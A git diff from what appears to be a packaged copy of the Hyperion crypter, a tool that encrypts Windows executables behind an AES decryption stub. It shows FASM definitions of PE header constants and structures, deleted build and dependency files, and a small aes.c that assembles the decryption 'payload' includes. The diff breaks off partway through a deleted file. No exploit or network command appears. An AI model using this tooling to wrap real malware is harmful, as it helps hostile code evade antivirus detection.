+IMAGE_FILE_MACHINE_R10000	=	0168h
+IMAGE_FILE_MACHINE_WCEMIPSV2	=	0169h
+IMAGE_FILE_MACHINE_ALPHA	=	0184h
+IMAGE_FILE_MACHINE_SH3	=	01a2h
+IMAGE_FILE_MACHINE_SH3DSP	=	01a3h
+IMAGE_FILE_MACHINE_SH3E =	01a4h
+IMAGE_FILE_MACHINE_SH4	=	01a6h
+IMAGE_FILE_MACHINE_SH5	=	01a8h
+IMAGE_FILE_MACHINE_ARM	=	01c0h
+IMAGE_FILE_MACHINE_THUMB	=	01c2h
+IMAGE_FILE_MACHINE_AM33 =	01d3h
+IMAGE_FILE_MACHINE_POWERPC	=	01F0h
+IMAGE_FILE_MACHINE_POWERPCFP	=	01f1h
+IMAGE_FILE_MACHINE_IA64 =	0200h
+IMAGE_FILE_MACHINE_MIPS16	=	0266h
+IMAGE_FILE_MACHINE_ALPHA64	=	0284h
+IMAGE_FILE_MACHINE_MIPSFPU	=	0366h
+IMAGE_FILE_MACHINE_MIPSFPU16	=	0466h
+IMAGE_FILE_MACHINE_AXP64	=	IMAGE_FILE_MACHINE_ALPHA64
+IMAGE_FILE_MACHINE_TRICORE	=	0520h
+IMAGE_FILE_MACHINE_CEF	=	0CEFh
+IMAGE_FILE_MACHINE_EBC	=	0EBCh
+IMAGE_FILE_MACHINE_AMD64	=	8664h
+IMAGE_FILE_MACHINE_M32R =	9041h
+IMAGE_FILE_MACHINE_CEE	=	0C0EEh
+
+IMAGE_SIZEOF_NT_OPTIONAL32_HEADER	=	224
+IMAGE_NT_OPTIONAL_HDR32_MAGIC	=	10bh
+
+IMAGE_FILE_RELOCS_STRIPPED = 0001h
+IMAGE_FILE_EXECUTABLE_IMAGE = 0002h
+IMAGE_FILE_LINE_NUMS_STRIPPED = 0004h
+IMAGE_FILE_LOCAL_SYMS_STRIPPED = 0008h
+IMAGE_FILE_AGGRESIVE_WS_TRIM = 0010h
+IMAGE_FILE_LARGE_ADDRESS_AWARE = 0020h
+IMAGE_FILE_BYTES_REVERSED_LO = 0080h
+IMAGE_FILE_32BIT_MACHINE = 0100h
+IMAGE_FILE_DEBUG_STRIPPED = 0200h
+IMAGE_FILE_REMOVABLE_RUN_FROM_SWAP = 0400h
+IMAGE_FILE_NET_RUN_FROM_SWAP = 0800h
+IMAGE_FILE_SYSTEM = 1000h
+IMAGE_FILE_DLL = 2000h
+IMAGE_FILE_UP_SYSTEM_ONLY = 4000h
+IMAGE_FILE_BYTES_REVERSED_HI = 8000h
+
+IMAGE_SUBSYSTEM_UNKNOWN  = 0
+IMAGE_SUBSYSTEM_NATIVE	= 1
+IMAGE_SUBSYSTEM_WINDOWS_GUI  = 2
+IMAGE_SUBSYSTEM_WINDOWS_CUI  = 3
+IMAGE_SUBSYSTEM_OS2_CUI  = 5
+IMAGE_SUBSYSTEM_POSIX_CUI  = 7
+IMAGE_SUBSYSTEM_NATIVE_WINDOWS	= 8
+IMAGE_SUBSYSTEM_WINDOWS_CE_GUI	= 9
+IMAGE_SUBSYSTEM_EFI_APPLICATION  = 10
+IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER  = 11
+IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER  = 12
+IMAGE_SUBSYSTEM_EFI_ROM  = 13
+IMAGE_SUBSYSTEM_XBOX  = 14
+IMAGE_SUBSYSTEM_WINDOWS_BOOT_APPLICATION  = 16
+
+IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE  = 0040h
+IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY  = 0080h
+IMAGE_DLLCHARACTERISTICS_NX_COMPAT  = 0100h
+IMAGE_DLLCHARACTERISTICS_NO_ISOLATION  = 0200h
+IMAGE_DLLCHARACTERISTICS_NO_SEH  = 0400h
+IMAGE_DLLCHARACTERISTICS_NO_BIND  = 0800h
+IMAGE_DLLCHARACTERISTICS_WDM_DRIVER  = 2000h
+IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE	= 8000h
+
+IMAGE_DIRECTORY_ENTRY_EXPORT  = 0
+IMAGE_DIRECTORY_ENTRY_IMPORT  = 1
+IMAGE_DIRECTORY_ENTRY_RESOURCE	= 2
+IMAGE_DIRECTORY_ENTRY_EXCEPTION  = 3
+IMAGE_DIRECTORY_ENTRY_SECURITY	= 4
+IMAGE_DIRECTORY_ENTRY_BASERELOC  = 5
+IMAGE_DIRECTORY_ENTRY_DEBUG  = 6
+IMAGE_DIRECTORY_ENTRY_COPYRIGHT = 7
+IMAGE_DIRECTORY_ENTRY_ARCHITECTURE  = 7
+IMAGE_DIRECTORY_ENTRY_GLOBALPTR  = 8
+IMAGE_DIRECTORY_ENTRY_TLS  = 9
+IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG  = 10
+IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT  = 11
+IMAGE_DIRECTORY_ENTRY_IAT  = 12
+IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT  = 13
+IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14
+
+IMAGE_SIZEOF_SECTION_HEADER	=	40
+
+IMAGE_SCN_TYPE_NO_PAD = 00000008h
+IMAGE_SCN_CNT_CODE = 00000020h
+IMAGE_SCN_CNT_INITIALIZED_DATA = 00000040h
+IMAGE_SCN_CNT_UNINITIALIZED_DATA = 00000080h
+IMAGE_SCN_LNK_OTHER = 00000100h
+IMAGE_SCN_LNK_INFO = 00000200h
+IMAGE_SCN_LNK_REMOVE = 00000800h
+IMAGE_SCN_LNK_COMDAT = 00001000h
+IMAGE_SCN_NO_DEFER_SPEC_EXC = 00004000h
+IMAGE_SCN_GPREL = 00008000h
+IMAGE_SCN_MEM_FARDATA = 00008000h
+IMAGE_SCN_MEM_PURGEABLE = 00020000h
+IMAGE_SCN_MEM_16BIT = 00020000h
+IMAGE_SCN_MEM_LOCKED = 00040000h
+IMAGE_SCN_MEM_PRELOAD = 00080000h
+IMAGE_SCN_ALIGN_1BYTES = 00100000h
+IMAGE_SCN_ALIGN_2BYTES = 00200000h
+IMAGE_SCN_ALIGN_4BYTES = 00300000h
+IMAGE_SCN_ALIGN_8BYTES = 00400000h
+IMAGE_SCN_ALIGN_16BYTES = 00500000h
+IMAGE_SCN_ALIGN_32BYTES = 00600000h
+IMAGE_SCN_ALIGN_64BYTES = 00700000h
+IMAGE_SCN_ALIGN_128BYTES = 00800000h
+IMAGE_SCN_ALIGN_256BYTES = 00900000h
+IMAGE_SCN_ALIGN_512BYTES = 00A00000h
+IMAGE_SCN_ALIGN_1024BYTES = 00B00000h
+IMAGE_SCN_ALIGN_2048BYTES = 00C00000h
+IMAGE_SCN_ALIGN_4096BYTES = 00D00000h
+IMAGE_SCN_ALIGN_8192BYTES = 00E00000h
+IMAGE_SCN_LNK_NRELOC_OVFL = 01000000h
+IMAGE_SCN_MEM_DISCARDABLE = 02000000h
+IMAGE_SCN_MEM_NOT_CACHED = 04000000h
+IMAGE_SCN_MEM_NOT_PAGED = 08000000h
+IMAGE_SCN_MEM_SHARED = 10000000h
+IMAGE_SCN_MEM_EXECUTE = 20000000h
+IMAGE_SCN_MEM_READ = 40000000h
+IMAGE_SCN_MEM_WRITE = 80000000h
+IMAGE_SCN_SCALE_INDEX = 00000001h
+
+struct IMAGE_DOS_HEADER
+	e_magic 	  dw	  ?
+	e_cblp		  dw	  ?
+	e_cp		  dw	  ?
+	e_crlc		  dw	  ?
+	e_cparhdr	  dw	  ?
+	e_minalloc	  dw	  ?
+	e_maxalloc	  dw	  ?
+	e_ss		  dw	  ?
+	e_sp		  dw	  ?
+	e_csum		  dw	  ?
+	e_ip		  dw	  ?
+	e_cs		  dw	  ?
+	e_lfarlc	  dw	  ?
+	e_ovno		  dw	  ?
+	e_res		  rw	  4
+	e_oemid 	  dw	  ?
+	e_oeminfo	  dw	  ?
+	e_res2		  rw	  10
+	e_lfanew	  dd	  ?
+ends
+
+struct IMAGE_FILE_HEADER
+	Machine 	      dw    ?
+	NumberOfSections      dw    ?
+	TimeDateStamp	      dd    ?
+	PointerToSymbolTable  dd    ?
+	NumberOfSymbols       dd    ?
+	SizeOfOptionalHeader  dw    ?
+	Characteristics       dw    ?
+ends
+
+struct IMAGE_DATA_DIRECTORY
+	VirtualAddress	  dd	  ?
+	isize		  dd	  ?
+ends
+
+IMAGE_NUMBEROF_DIRECTORY_ENTRIES = 16
+
+struct IMAGE_OPTIONAL_HEADER64
+	Magic			      dw       ?
+	MajorLinkerVersion	      db       ?
+	MinorLinkerVersion	      db       ?
+	SizeOfCode		      dd       ?
+	SizeOfInitializedData	      dd       ?
+	SizeOfUninitializedData       dd       ?
+	AddressOfEntryPoint	      dd       ?
+	BaseOfCode		      dd       ?
+
+	ImageBase		      dq       ?
+	SectionAlignment	      dd       ?
+	FileAlignment		      dd       ?
+	MajorOperatingSystemVersion   dw       ?
+	MinorOperatingSystemVersion   dw       ?
+	MajorImageVersion	      dw       ?
+	MinorImageVersion	      dw       ?
+	MajorSubsystemVersion	      dw       ?
+	MinorSubsystemVersion	      dw       ?
+	Win32VersionValue	      dd       ?
+	SizeOfImage		      dd       ?
+	SizeOfHeaders		      dd       ?
+	CheckSum		      dd       ?
+	Subsystem		      dw       ?
+	DllCharacteristics	      dw       ?
+	SizeOfStackReserve	      dq       ?
+	SizeOfStackCommit	      dq       ?
+	SizeOfHeapReserve	      dq       ?
+	SizeOfHeapCommit	      dq       ?
+	LoaderFlags		      dd       ?
+	NumberOfRvaAndSizes	      dd       ?
+
+	DataDirectory				  rb (sizeof.IMAGE_DATA_DIRECTORY*IMAGE_NUMBEROF_DIRECTORY_ENTRIES)
+ends
+
+struct IMAGE_NT_HEADERS64
+	Signature	  dd			   ?
+	FileHeader	  IMAGE_FILE_HEADER	   ?
+	OptionalHeader	  IMAGE_OPTIONAL_HEADER64  ?
+ends
+
+IMAGE_SIZEOF_SHORT_NAME = 8
+
+struct IMAGE_SECTION_HEADER
+  _Name db IMAGE_SIZEOF_SHORT_NAME dup (?)
+  union
+    PhysicalAddress	dd ?
+    VirtualSize 	dd ?
+  ends
+  VirtualAddress	dd ?
+  SizeOfRawData 	dd ?
+  PointerToRawData	dd ?
+  PointerToRelocations	dd ?
+  PointerToLinenumbers	dd ?
+  NumberOfRelocations	dw ?
+  NumberOfLinenumbers	dw ?
+  Characteristics	dd ?
+ends
+
+struct IMAGE_IMPORT_DESCRIPTOR
+	union
+	Characteristics dd	?
+	OriginalFirstThunk	dd	?
+	ends
+	TimeDateStamp	dd	?
+	ForwarderChain	dd	?
+	Name_	dd	?
+	FirstThunk	dd	?
+ends
+
+struct IMAGE_IMPORT_BY_NAME
+	Hint	dw	?
+	Name_	rb  1
+ends
+
+IMAGE_ORDINAL_FLAG64 = 8000000000000000h
diff --git a/binary/hyperion/source/Src/Crypter/Hyperion.cbp b/binary/hyperion/source/Src/Crypter/Hyperion.cbp
deleted file mode 100644
index 2bd0787..0000000
--- a/binary/hyperion/source/Src/Crypter/Hyperion.cbp
+++ /dev/null
@@ -1,70 +0,0 @@
-
-
-	
-	
-		
-
diff --git a/binary/hyperion/source/Src/Crypter/Hyperion.depend b/binary/hyperion/source/Src/Crypter/Hyperion.depend
deleted file mode 100644
index 7b56452..0000000
--- a/binary/hyperion/source/Src/Crypter/Hyperion.depend
+++ /dev/null
@@ -1,453 +0,0 @@
-# depslib dependency file v1.0
-1307313232 source:e:\projects\hyperion\main.cpp
-	
-	
-	"pe.h"
-	"fileaccess.h"
-	"peanalysis.h"
-	"patchcontainer.h"
-
-1304981796 e:\projects\hyperion\pe.h
-	"fileaccess.h"
-	"stdint.h"
-
-1304981762 source:e:\projects\hyperion\pe.cpp
-	"pe.h"
-	
-	
-
-1304031132 e:\projects\hyperion\fileaccess.h
-	"stdint.h"
-
-1304031532 source:e:\projects\hyperion\fileaccess.cpp
-	
-	
-	"fileaccess.h"
-
-1305067543 source:e:\projects\hyperion\encryptdata.cpp
-	
-	
-	"encryptdata.h"
-	"fileaccess.h"
-
-1307307991 e:\projects\hyperion\encryptdata.h
-	"pe.h"
-	
-
-1307311722 source:e:\projects\hyperion\peanalysis.cpp
-	
-	
-	"peanalysis.h"
-	"fileaccess.h"
-
-1307311805 e:\projects\hyperion\peanalysis.h
-	"pe.h"
-	
-
-1307313263 e:\projects\hyperion\patchcontainer.h
-	"peanalysis.h"
-
-1307313258 source:e:\projects\hyperion\patchcontainer.cpp
-	"patchcontainer.h"
-	"peanalysis.h"
-
-1307313232 source:f:\projects\hyperion\main.cpp
-	
-	
-	"pe.h"
-	"fileaccess.h"
-	"peanalysis.h"
-	"patchcontainer.h"
-
-1304981796 f:\projects\hyperion\pe.h
-	"fileaccess.h"
-	"stdint.h"
-
-1304031132 f:\projects\hyperion\fileaccess.h
-	"stdint.h"
-
-1307311805 f:\projects\hyperion\peanalysis.h
-	"pe.h"
-	
-
-1307313263 f:\projects\hyperion\patchcontainer.h
-	"peanalysis.h"
-
-1307313258 source:f:\projects\hyperion\patchcontainer.cpp
-	"patchcontainer.h"
-	"peanalysis.h"
-
-1304981762 source:f:\projects\hyperion\pe.cpp
-	"pe.h"
-	
-	
-
-1307311722 source:f:\projects\hyperion\peanalysis.cpp
-	
-	
-	"peanalysis.h"
-	"fileaccess.h"
-
-1304031532 source:f:\projects\hyperion\fileaccess.cpp
-	
-	
-	"fileaccess.h"
-
-1304978162 source:f:\projects\hyperion\crypter\pe.cpp
-	"pe.h"
-	
-	
-
-1315062595 f:\projects\hyperion\crypter\pe.h
-	"fileaccess.h"
-	"stdint.h"
-
-1311888507 f:\projects\hyperion\crypter\fileaccess.h
-	"stdint.h"
-
-1315062622 source:f:\projects\hyperion\crypter\peanalysis.cpp
-	
-	
-	
-	"peanalysis.h"
-	"fileaccess.h"
-
-1311624287 f:\projects\hyperion\crypter\peanalysis.h
-	"pe.h"
-	
-
-1311888499 source:f:\projects\hyperion\crypter\fileaccess.cpp
-	
-	
-	"fileaccess.h"
-
-1315743893 source:f:\projects\hyperion\crypter\main.cpp
-	
-	
-	
-	
-	"pe.h"
-	"fileaccess.h"
-	"peanalysis.h"
-	"createoutput.h"
-
-1307884947 f:\projects\hyperion\crypter\patchcontainer.h
-	"peanalysis.h"
-	"createoutput.h"
-
-1307880669 source:f:\projects\hyperion\crypter\patchcontainer.cpp
-	
-	
-	"patchcontainer.h"
-	"peanalysis.h"
-
-1315746584 source:f:\projects\hyperion\crypter\createoutput.cpp
-	
-	
-	
-	
-	
-	"createoutput.h"
-
-1315762470 f:\projects\hyperion\crypter\createoutput.h
-	"fileaccess.h"
-	"peanalysis.h"
-
-1311892099 source:f:\projects\hyperion\crypter2\fileaccess.cpp
-	
-	
-	"fileaccess.h"
-
-1311892107 f:\projects\hyperion\crypter2\fileaccess.h
-	"stdint.h"
-
-1304981762 source:f:\projects\hyperion\crypter2\pe.cpp
-	"pe.h"
-	
-	
-
-1307873664 f:\projects\hyperion\crypter2\pe.h
-	"fileaccess.h"
-	"stdint.h"
-
-1311628075 source:f:\projects\hyperion\crypter2\peanalysis.cpp
-	
-	
-	"peanalysis.h"
-	"fileaccess.h"
-
-1311627887 f:\projects\hyperion\crypter2\peanalysis.h
-	"pe.h"
-	
-
-1312233679 source:f:\projects\hyperion\crypter2\createoutput.cpp
-	
-	
-	
-	
-	"createoutput.h"
-
-1312233317 f:\projects\hyperion\crypter2\createoutput.h
-	"fileaccess.h"
-	"peanalysis.h"
-
-1312234002 source:f:\projects\hyperion\crypter2\main.cpp
-	
-	
-	"pe.h"
-	"fileaccess.h"
-	"peanalysis.h"
-	"createoutput.h"
-
-1307884947 f:\projects\hyperion\crypter2\patchcontainer.h
-	"peanalysis.h"
-	"createoutput.h"
-
-1311511420 source:f:\projects\hyperion\crypter2\patchcontainer.cpp
-	
-	
-	"patchcontainer.h"
-	"peanalysis.h"
-
-1311892099 source:f:\projects\hyperion\src\crypter\fileaccess.cpp
-	
-	
-	"fileaccess.h"
-
-1311892107 f:\projects\hyperion\src\crypter\fileaccess.h
-	"stdint.h"
-
-1331056347 source:f:\projects\hyperion\src\crypter\main.cpp
-	
-	
-	
-	
-	"pe.h"
-	"fileaccess.h"
-	"peanalysis.h"
-	"createoutput.h"
-
-1331055330 f:\projects\hyperion\src\crypter\pe.h
-	"fileaccess.h"
-	"stdint.h"
-
-1331055401 f:\projects\hyperion\src\crypter\peanalysis.h
-	"pe.h"
-	
-
-1333110943 f:\projects\hyperion\src\crypter\createoutput.h
-	"fileaccess.h"
-	"peanalysis.h"
-
-1304981762 source:f:\projects\hyperion\src\crypter\pe.cpp
-	"pe.h"
-	
-	
-
-1331055659 source:f:\projects\hyperion\src\crypter\peanalysis.cpp
-	
-	
-	
-	"peanalysis.h"
-	"fileaccess.h"
-
-1333102984 source:f:\projects\hyperion\src\crypter\createoutput.cpp
-	
-	
-	
-	
-	
-	
-	
-	"createoutput.h"
-
-1333289160 source:c:\dokumente und einstellungen\christian\desktop\hyperion-1.0\src\crypter\fileaccess.cpp
-	
-	
-	"fileaccess.h"
-
-1311892080 c:\dokumente und einstellungen\christian\desktop\hyperion-1.0\src\crypter\fileaccess.h
-	"stdint.h"
-
-1398035481 source:c:\dokumente und einstellungen\christian\desktop\hyperion-1.0\src\crypter\main.cpp
-	
-	
-	
-	
-	"pe.h"
-	"hyperion.h"
-	"fileaccess.h"
-	"peanalysis.h"
-	"createoutput.h"
-
-1331055300 c:\dokumente und einstellungen\christian\desktop\hyperion-1.0\src\crypter\pe.h
-	"fileaccess.h"
-	"stdint.h"
-
-1331055360 c:\dokumente und einstellungen\christian\desktop\hyperion-1.0\src\crypter\peanalysis.h
-	"pe.h"
-	
-
-1398035359 c:\dokumente und einstellungen\christian\desktop\hyperion-1.0\src\crypter\createoutput.h
-	"fileaccess.h"
-	"peanalysis.h"
-
-1304981760 source:c:\dokumente und einstellungen\christian\desktop\hyperion-1.0\src\crypter\pe.cpp
-	"pe.h"
-	
-	
-
-1331055660 source:c:\dokumente und einstellungen\christian\desktop\hyperion-1.0\src\crypter\peanalysis.cpp
-	
-	
-	
-	"peanalysis.h"
-	"fileaccess.h"
-
-1398035443 c:\dokumente und einstellungen\christian\desktop\hyperion-1.0\src\crypter\hyperion.h
-
-1398035351 source:c:\dokumente und einstellungen\christian\desktop\hyperion-1.0\src\crypter\createoutput.cpp
-	
-	
-	
-	
-	
-	
-	
-	"hyperion.h"
-	"createoutput.h"
-
-1398035805 source:c:\dokumente und einstellungen\christian\desktop\hyperion-1.0\src\crypter\hyperion.cpp
-	
-	
-	
-	
-	"pe.h"
-	"hyperion.h"
-	"fileaccess.h"
-	"peanalysis.h"
-	"createoutput.h"
-
-1398199681 source:c:\dokumente und einstellungen\christian\desktop\hyperion-1.1\src\crypter\fileaccess.cpp
-	
-	
-	"fileaccess.h"
-
-1311892080 c:\dokumente und einstellungen\christian\desktop\hyperion-1.1\src\crypter\fileaccess.h
-	"stdint.h"
-
-1398199814 source:c:\dokumente und einstellungen\christian\desktop\hyperion-1.1\src\crypter\pe.cpp
-	"pe.h"
-	
-	
-
-1331055300 c:\dokumente und einstellungen\christian\desktop\hyperion-1.1\src\crypter\pe.h
-	"fileaccess.h"
-	"stdint.h"
-
-1398199530 source:c:\dokumente und einstellungen\christian\desktop\hyperion-1.1\src\crypter\peanalysis.cpp
-	
-	
-	
-	"peanalysis.h"
-	"fileaccess.h"
-
-1331055360 c:\dokumente und einstellungen\christian\desktop\hyperion-1.1\src\crypter\peanalysis.h
-	"pe.h"
-	
-
-1398199114 source:c:\dokumente und einstellungen\christian\desktop\hyperion-1.1\src\crypter\createoutput.cpp
-	
-	
-	
-	
-	
-	
-	
-	"hyperion.h"
-	"createoutput.h"
-
-1398035443 c:\dokumente und einstellungen\christian\desktop\hyperion-1.1\src\crypter\hyperion.h
-
-1398187336 c:\dokumente und einstellungen\christian\desktop\hyperion-1.1\src\crypter\createoutput.h
-	"fileaccess.h"
-	"peanalysis.h"
-
-1398198609 source:c:\dokumente und einstellungen\christian\desktop\hyperion-1.1\src\crypter\hyperion.cpp
-	
-	
-	
-	
-	"pe.h"
-	"hyperion.h"
-	"fileaccess.h"
-	"peanalysis.h"
-	"createoutput.h"
-
-1398714768 source:c:\users\belial\desktop\hyperion-1.1\src\crypter\fileaccess.cpp
-	
-	
-	"fileaccess.h"
-	"ostreamlog.h"
-
-1311892080 c:\users\belial\desktop\hyperion-1.1\src\crypter\fileaccess.h
-	"stdint.h"
-
-1398715396 source:c:\users\belial\desktop\hyperion-1.1\src\crypter\pe.cpp
-	
-	
-	"pe.h"
-	"ostreamlog.h"
-
-1331055300 c:\users\belial\desktop\hyperion-1.1\src\crypter\pe.h
-	"fileaccess.h"
-	"stdint.h"
-
-1398715479 source:c:\users\belial\desktop\hyperion-1.1\src\crypter\peanalysis.cpp
-	
-	
-	
-	"peanalysis.h"
-	"fileaccess.h"
-	"ostreamlog.h"
-
-1331055360 c:\users\belial\desktop\hyperion-1.1\src\crypter\peanalysis.h
-	"pe.h"
-	
-
-1399578000 source:c:\users\belial\desktop\hyperion-1.1\src\crypter\createoutput.cpp
-	
-	
-	
-	
-	
-	
-	
-	"hyperion.h"
-	"createoutput.h"
-
-1399577979 c:\users\belial\desktop\hyperion-1.1\src\crypter\hyperion.h
-	"fileaccess.h"
-	"peanalysis.h"
-	"createoutput.h"
-	"pe.h"
-	"ostreamlog.h"
-
-1399578190 c:\users\belial\desktop\hyperion-1.1\src\crypter\createoutput.h
-	"fileaccess.h"
-	"peanalysis.h"
-
-1398712059 source:c:\users\belial\desktop\hyperion-1.1\src\crypter\hyperion.cpp
-	
-	
-	
-	
-	"hyperion.h"
-
-1398715238 source:c:\users\belial\desktop\hyperion-1.1\src\crypter\ostreamlog.cpp
-	"ostreamlog.h"
-	
-
-1398715303 c:\users\belial\desktop\hyperion-1.1\src\crypter\ostreamlog.h
-	
-
diff --git a/binary/hyperion/source/Src/Crypter/Hyperion.layout b/binary/hyperion/source/Src/Crypter/Hyperion.layout
deleted file mode 100644
index 71abd34..0000000
--- a/binary/hyperion/source/Src/Crypter/Hyperion.layout
+++ /dev/null
@@ -1,64 +0,0 @@
-
-
-	
-	
-		
-			
-		
-	
-	
-		
-			
-		
-	
-	
-		
-			
-		
-	
-	
-		
-			
-		
-	
-	
-		
-			
-		
-	
-	
-		
-			
-		
-	
-	
-		
-			
-		
-	
-	
-		
-			
-		
-	
-	
-		
-			
-		
-	
-	
-		
-			
-		
-	
-	
-		
-			
-		
-	
-	
-		
-			
-		
-	
-
diff --git a/binary/hyperion/source/Src/Crypter/aes.c b/binary/hyperion/source/Src/Crypter/aes.c
new file mode 100644
index 0000000..9ffa001
--- /dev/null
+++ b/binary/hyperion/source/Src/Crypter/aes.c
@@ -0,0 +1,53 @@
+#include "hyperion.h"
+#include "fasmoutput.h"
+
+//include '..\..\Payloads\Aes\32\aes.inc'
+//include '..\..\Payloads\Aes\32\aes.asm'
+//include '..\..\Payloads\Aes\32\decryptexecutable.asm'
+
+BOOL decryptAES(BOOL pe32){
+  const char* payload_directory;
+  const char* container_directory;
+  
+  //select destination paths
+  if(pe32){
+    payload_directory = PAYLOAD32_AES_DIR;
+    container_directory = CONTAINER32_DIR;
+  }
+  else{
+    payload_directory = PAYLOAD64_AES_DIR;
+    container_directory = CONTAINER64_DIR;
+  }
+
+  //create file names
+  char aes_inc[MAX_CHAR_SIZE];
+  aes_inc[0] = 0;
+  strlcat(aes_inc, payload_directory, MAX_CHAR_SIZE);
+  strlcat(aes_inc, AES_INC_FILENAME, MAX_CHAR_SIZE);
+  
+  char aes_asm[MAX_CHAR_SIZE];
+  aes_asm[0] = 0;
+  strlcat(aes_asm, payload_directory, MAX_CHAR_SIZE);
+  strlcat(aes_asm, AES_ASM_FILENAME, MAX_CHAR_SIZE);
+  
+  char decrypter_asm[MAX_CHAR_SIZE];
+  decrypter_asm[0] = 0;
+  strlcat(decrypter_asm, payload_directory, MAX_CHAR_SIZE);
+  strlcat(decrypter_asm, AES_DECRYPTION_FILENAME, MAX_CHAR_SIZE);
+  
+  //create include file to use aes algorithm
+  if(!fasmInclude(container_directory, DECRYPTION_PAYLOAD_FILENAME, aes_inc, FALSE))
+  {
+          return FALSE;
+  }
+  if(!fasmInclude(container_directory, DECRYPTION_PAYLOAD_FILENAME, aes_asm, TRUE))
+  {
+          return FALSE;
+  }
+  if(!fasmInclude(container_directory, DECRYPTION_PAYLOAD_FILENAME, decrypter_asm, TRUE))
+  {
+          return FALSE;
+  }
+  
+  return TRUE;
+}
diff --git a/binary/hyperion/source/Src/Crypter/createoutput.cpp b/binary/hyperion/source/Src/Crypter/createoutput.cpp
deleted file mode 100644
index 6f69be2..0000000
--- a/binary/hyperion/source/Src/Crypter/createoutput.cpp
+++ /dev/null
@@ -1,312 +0,0 @@
-#include 
-#include 
-#include 
-#include 
-#include 
-#include 
-#include 
-
-#include "hyperion.h"
-#include "createoutput.h"
-
-using namespace std;
-using namespace hyperion;
-
-extern OstreamLog ostreamlog;
-
-namespace hyperion{
-
-    /**
-     * Declares a FASM constant
-     * Output: "